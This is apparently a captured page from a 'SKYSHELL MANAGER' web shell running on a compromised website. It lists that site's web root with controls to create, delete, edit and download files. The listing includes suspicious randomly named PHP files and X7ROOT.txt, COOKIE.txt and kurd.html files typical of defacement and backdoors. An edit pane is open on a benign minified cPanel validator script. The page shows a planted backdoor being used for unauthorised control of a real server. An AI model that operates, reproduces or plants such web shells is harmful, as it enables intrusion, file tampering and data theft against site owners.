📁
SKYSHELL MANAGER
PHP v8.2.30
Create
Create
Path:
root
/
home
/
qooetu
/
costes.qooetu.com
/
Name
Size
Perm
Actions
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
2e19d9
-
0755
🗑️
🏷️
🔒
📁
6b114
-
0755
🗑️
🏷️
🔒
📁
Modules
-
0755
🗑️
🏷️
🔒
📁
app
-
0755
🗑️
🏷️
🔒
📁
assets
-
0755
🗑️
🏷️
🔒
📁
bootstrap
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
config
-
0755
🗑️
🏷️
🔒
📁
css
-
0755
🗑️
🏷️
🔒
📁
database
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
js
-
0755
🗑️
🏷️
🔒
📁
nbproject
-
0755
🗑️
🏷️
🔒
📁
public
-
0755
🗑️
🏷️
🔒
📁
resources
-
0755
🗑️
🏷️
🔒
📁
routes
-
0755
🗑️
🏷️
🔒
📁
storage
-
0755
🗑️
🏷️
🔒
📁
tests
-
0755
🗑️
🏷️
🔒
📁
uploads
-
0755
🗑️
🏷️
🔒
📁
vendor
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
COOKIE.txt
0.2 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
X7ROOT.txt
0.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
defaults.php
1.29 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
engine.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
813.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
features.php
11.28 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
googlecfb82e09419fc0f6.html
0.05 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
1.56 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
inputs.php
0.12 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
kurd.html
1.07 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
library.php
0 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
p.php
2.75 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.04 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
product.php
1.78 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
qpmwztts.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.32 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
tovmbkwh.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
tyyffovi.php
0.74 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
veoxv.html
1.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: validateUsernameWithDomain.min.js
define(["angular","cjt/util/locale","cjt/validator/validator-utils","cjt/validator/validateDirectiveFactory","app/services/userService"],(function(e,t,n,a,r){"use strict";var i=e.module("App");i.directive("usernameWithDomainWrapper",[function(){var t=function(e){this.username=this.domain="",this.$attrs=e};return e.extend(t.prototype,{setDomain:function(e){return void 0!==e&&(this.domain=e),this.getTotalLength()},setUsername:function(e){return void 0!==e&&(this.username=e),this.getTotalLength()},getUsernameAndDomain:function(){return this.username+"@"+this.domain},getTotalLength:function(){return this.getUsernameAndDomain().length}}),{restrict:"A",scope:!1,controller:["$attrs",t]}}]),i.directive("usernameWithDomain",["userService","$q",function(e,r){return{restrict:"A",scope:!1,require:["^^usernameWithDomainWrapper","ngModel"],link:function(i,o,s,u){var l=u[0],c=u[1],m=s.usernameWithDomain;if("username"===m){l.validateUsername=c.$validate;var d=o.controller("form");n.initializeExtendedReporting(c,d);var h=function(e){var a=n.initializeValidationResult();return e>254&&a.addError("maxLength",t.maketext("The combined length of the username, [asis,@] character, and domain cannot exceed [numf,_1] characters.",254)),a};c.$validators.usernameWithDomain=function(e){var t=l.setUsername(e);return a.run("usernameWithDomain",c,d,h,t)};var v=function(t){return e.checkAccountConflicts(t).then((function(e){return i.$eval(l.$attrs.lookupCallback,{responseData:e}),e})).then((function(){return n.initializeValidationResult()}),(function(e){var t=n.initializeValidationResult(!0);return t.addError("usernameIsAvailable",e),t}))};c.$asyncValidators.usernameIsAvailable=function(e,t){var n=l.getUsernameAndDomain();return a.runAsync(r,"usernameIsAvailable",c,d,v,n)}}else{if("domain"!==m)throw new Error("The value for the username-with-domain directive needs to be set to 'username' or 'domain'.");c.$formatters.push((function(e){return l.setDomain(c.$modelValue),e})),c.$viewChangeListeners.push((function(){l.setDomain(c.$modelValue),l.validateUsername()}))}}}}])}));
Save